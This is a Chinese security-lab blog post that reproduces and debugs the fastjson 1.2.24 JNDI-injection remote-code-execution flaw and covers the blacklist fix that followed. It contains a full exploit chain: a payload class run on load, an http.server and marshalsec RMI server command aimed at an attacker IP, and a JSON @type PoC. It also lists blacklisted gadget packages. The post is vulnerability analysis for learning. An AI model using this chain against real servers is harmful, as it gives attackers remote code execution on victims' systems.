追洞小組 | fastjson1.2.24復現+分析

出品｜MS08067實驗室（www.ms08067.com)javascript

本文做者：愛吃芝士的小葵（Ms08067實驗室追洞小組成員）java

一、靶場搭建
二、漏洞復現
三、漏洞分析
四、漏洞修復
五、心得python

靶場搭建

使用idea maven項目建立，在pom中導入fastjson的座標。（由於本文復現1.2.24的rce，因此版本要小於1.2.24，本文采 取1.2.23版本座標）。
導入以後在右邊點擊maven圖標導入。web

**坑點
其中環境有一個很是細小的點，能夠說是個大坑，我調試了好久，以前的報錯以下：
一、rmi+jndi環境：java.sql.SQLException: JdbcRowSet (鏈接) JNDI 沒法鏈接 二、ldap+jndi環境：java.lang.ClassCastException: javax.naming.Reference cannot be cast to javax.sql.DataSource
後來才發現是java的環境沒有配置對，雖然都是jdk1.8，可是復現的環境採用1.8.0_102,以前的環境1.8.0_221沒有復現成 功。由於JDK 8u113 以後，系統屬性 com.sun.jndi.rmi.object.trustURLCodebase 、 com.sun.jndi.cosnaming.object.trustURLCodebase 的默認值變爲false，即默認不容許RMI、cosnaming從遠程的 Codebase加載Reference工廠類。spring

漏洞復現

1、準備被遠程下載的class文件

這邊簡單彈個計算器，也能夠反彈shellsql

package com.v1rus；

public class Calc{
public Calc(){
try{
Runtime.getRuntime().exec("calc");
}catch (Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Calc c = new Calc();
}
}

命令行輸入 javac Calc.java ，在當前文件夾下會生成Calc.class文件。shell

2、 http服務

能夠簡單的用python3在當前Calc.class文件的文件夾下起http服務apache

python -m http.server 8088

3、RMI服務

使用marshalsec起rmi服務json

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.249.156:8088/#Calc" 8

漏洞分析

fastjson在解析json的過程當中，支持使用autoType來實例化某一個具體的類，並調用該類的set/get方法來訪問屬性。經過查找代碼中相關的方法，便可構造出一些惡意利用鏈。
首先放上服務端使用的poc demo：tomcat

package com.v1rus;
import com.alibaba.fastjson.JSON;
public class Test {
public static void main(String[] args) {
String v1rus = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://192.168.249.15
JSON.parseObject(v1rus);
}
}

1、熟悉fastjson工做流程

咱們的poc中用到的類是
com.sun.rowset.JdbcRowSetImpl

Exception in thread "main" com.alibaba.fastjson.JSONException: set property error, autoCommit
at com.alibaba.fastjson.parser.deserializer.FieldDeserializer.setValue(FieldDeserializer.java:131)
at com.alibaba.fastjson.parser.deserializer.DefaultFieldDeserializer.parseField(DefaultFieldDeserializer.j
at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.parseField(JavaBeanDeserializer.java:722)
at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.deserialze(JavaBeanDeserializer.java:568)
at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.parseRest(JavaBeanDeserializer.java:877)
at com.alibaba.fastjson.parser.deserializer.FastjsonASMDeserializer_1_JdbcRowSetImpl.deserialze(Unknown So
at com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.deserialze(JavaBeanDeserializer.java:183)
at com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:368)
at com.alibaba.fastjson.parser.DefaultJSONParser.parse(DefaultJSONParser.java:1327) at com.alibaba.fastjson.parser.DefaultJSONParser.parse(DefaultJSONParser.java:1293)
at com.alibaba.fastjson.JSON.parse(JSON.java:137) at com.alibaba.fastjson.JSON.parse(JSON.java:128)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:201) at com.v1rus.Test.main(Test.java:8)

咱們直接進入 com.alibaba.fastjson.JSON 這個類中，並在parseObject函數上面下斷點。

最後會跟到這個方法上。經過DefaultJSONParser類去parse咱們傳入的字符串

跟進74行的parse代碼。這裏是根據JSONLexer的token爲12到case的判斷，進入關鍵函數

根據lexer.token()方法返回token的值，這裏是12，因此進入else進行處理。

而後進入while(true)循環，第一步驟就是lexer.skipWhitespace，跟進去查看方法

於是返回的是 「 號，因此能夠進入if判斷，根據變量名咱們也能夠得知，scanSymbol這個方法返回的是key關鍵字。
（key、value對）

你們能夠簡單的跟進
com.alibaba.fastjson.parser.JSONLexerBase#scanSymbol
這個函數走一下流程，最後會經過雙引號的閉合判斷來返回value字符串，這邊返回的就是第一個字符串 @type

繼續往下走到了這裏，將key和全局靜態常量做比較看是否爲 @type ，若是是的話，進入if判斷。

跟進 com.alibaba.fastjson.util#loadClass ，這裏面並無作什麼黑名單的過濾就講這個類對象返回了。

上面那行代碼，跟進分析

判斷是類名返回

跟進方法分析返回
FastJsonASMDeserializer_1_JdbcRowSetImpl

再跟進deserialze後繼續往下調試，進入setDataSourceName方法，將dataSourceName值設置爲目標RMI服務的地址
一路跟到parseField方法

調用smartMatch方法來處理咱們傳入的key值，跟進這個方法

以後回跟到
((FieldDeserializer)fieldDeserializer).parseField(parser, object, objectType, fieldValues);這行代碼，進入FieldDeserializer的parseField方法。進行一些Field的賦值操做。

再跟進
com.alibaba.fastjson.parser.deserializer.FieldDeserializer#setValue方法，根據fieldInfo.fieldClass判斷該類，最後進入箭頭指向的else體，經過反射調用setAutoCommit關鍵方法。嘿嘿，接下來不是隨心所欲。

這個jdk自帶的類必需要先得到一個connection，若是沒有的話先執行connect方法。咱們進去看看裏面有什麼。

由於咱們在前面經過setDataSourceName()方法設置了dataSourceName的值，因此進入esle if經過lookup方法去獲取dataSource。而rmi（java遠程方法調用機制）的主角就是這個方法，若是lookup裏面傳入的參數可控，就能夠指向咱們所構造的rmi服務，那麼就有很大的可能被攻擊。（InitialContext 是一個實現了Context接口的類。使用這個類做爲JNDI命名服務的入口點。）

這裏也簡單提一句JNDI和RMI關係，以便更好理解。簡單來講，JNDI (Java Naming and Directory Interface)是一組應用程序接口。JNDI底層支持RMI遠程對象，RMI註冊的服務能夠經過JNDI接口來訪問和調用。JNDI接口在初始化時，能夠將RMI URL做爲參數傳入，而JNDI注入就出如今客戶端的lookup()函數中。

用referenceWrapper包裝reference類，註冊在jndi的rmi服務實現上，這裏rmi服務器綁定的類並無實現相應的接口，而是經過Refernces類來綁定過一個外部的遠程對象。（這裏先說起一下，後面會詳細說明）一路跟進到這個最終的方法，該方法執行完就會加載完遠程類實現rce。能夠看到這裏的var3是RegistryContext類，調用lookup函數。

跟進去時候傳入的這個參數是Calc也就是/後面的請求文件，不爲空以後調用this.registry(RegistryImpl_Stub，stub和skel的概念是相對而言的，並不僅存在於服務端和客戶端之間)的lookup方法，是咱們可控的，因此就形成了JNDI注入漏洞。

繼續跟進marshelsec可能會出現這樣的錯誤:

java.net.SocketTimeoutException: Read timed out
at java.net.SocketInputStream.socketRead0(Native Method)
at java.net.SocketInputStream.socketRead(Unknown Source)
at java.net.SocketInputStream.read(Unknown Source)
at java.net.SocketInputStream.read(Unknown Source)
at java.io.BufferedInputStream.fill(Unknown Source)
at java.io.BufferedInputStream.read(Unknown Source)
at java.io.FilterInputStream.read(Unknown Source)
at marshalsec.jndi.RMIRefServer.doMessage(RMIRefServer.java:221)
at marshalsec.jndi.RMIRefServer.run(RMIRefServer.java:171)
at marshalsec.jndi.RMIRefServer.main(RMIRefServer.java:117)

緣由是網絡讀取數據超時，咱們跟進方法的同時加長的數據傳輸的時間，等待超時拋出錯誤。至此利用的部分已經結束。

疑惑

由於JNDI注入中RMI服務器最終執行遠程方法，可是目標服務器lookup()一個惡意的RMI服務地址，反而是目標服務器執行了。那麼到底是什麼緣由？
在JNDI服務中，RMI服務端除了直接綁定遠程對象以外，還能夠經過Reference類來綁定一個外部的遠程對象（當前名稱目錄系統以外的對象）。綁定了Reference以後，服務端會先經過Referenceable.getReference()獲取綁定對象的引用，而且在目錄中保存。當客戶端在lookup()查找這個遠程對象時，客戶端會獲取相應的object factory，最終經過factory類將reference轉換爲具體的對象實例。

簡而言之，在Server綁定Reference時，這個惡意對象是不在Server上的，Reference指向某個地址，Client會去這個地址
取出對象並在Client實例化。

總結

攻擊者準備rmi服務和web服務，將rmi絕對路徑注入到lookup方法中，受害者JNDI接口會指向攻擊者控制rmi服務器，JNDI接口向攻擊者控制web服務器遠程加載惡意代碼，執行構造函數形成RCE。

漏洞修復

從1.2.25開始對這個漏洞進行了修補，修補方式是會在com.alibaba.fastjson.parser.DefaultJSONParser#parseObject方法中調用 com.alibaba.fastjson.parser.ParserConfig#checkAutoType來檢查咱們傳入的類是否是在黑名單中，也就是將TypeUtils.loadClass替換爲checkAutoType()函數:

只有經過了白名單的校驗纔會調用loadClass。

可是這裏同時使用白名單和黑名單的方式來限制反序列化的類，只有當白名單不經過時纔會進行黑名單判斷，至關於白名單並無真正起到白名單的做用。咱們仍然能夠進入後續的流程來進行繞過。

黑名單裏面禁止了一些常見的反序列化漏洞利用鏈：

bsh
com.mchange
com.sun.
java.lang.Thread
java.net.Socket
java.rmi
javax.xml
org.apache.bcel
org.apache.commons.beanutils
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors
org.apache.commons.collections4.comparators
org.apache.commons.fileupload
org.apache.myfaces.context.servlet
org.apache.tomcat
org.apache.wicket.util
org.codehaus.groovy.runtime
org.hibernate
org.jboss
org.mozilla.javascript
org.python.core
org.springframework

心得

一、 Fastjson主要仍是利用了autotype功能實現"@type"字段指定反序列化的Class類型，因此儘可能關閉autotype就沒有問題。雖然Fastjson在1.2.24以後實現了一套黑名單，但仍是存在被繞過風險。
二、 rmi在fastjson中的利用只是jndi的一種手段，還有ldap等。是在rmi服務器上綁定reference對象，與rmi自己的反序列話不是頗有關係。它將從攻擊者控制的服務器獲取工廠類，而後實例化工廠以返回 JNDI所引用的對象的新實例。

轉載請聯繫做者並註明出處！

Ms08067安全實驗室專一於網絡安全知識的普及和培訓。團隊已出版《Web安全攻防：滲透測試實戰指南》，《內網安全攻防：滲透測試實戰指南》，《Python安全攻防：滲透測試實戰指南》，《Java代碼安全審計（入門篇）》等書籍。
團隊公衆號按期分享關於CTF靶場、內網滲透、APT方面技術乾貨，從零開始、以實戰落地爲主，致力於作一個實用的乾貨分享型公衆號。
官方網站：https://www.ms08067.com/

掃描下方二維碼加入實驗室VIP社區
加入後邀請加入內部VIP羣，內部微信羣永久有效！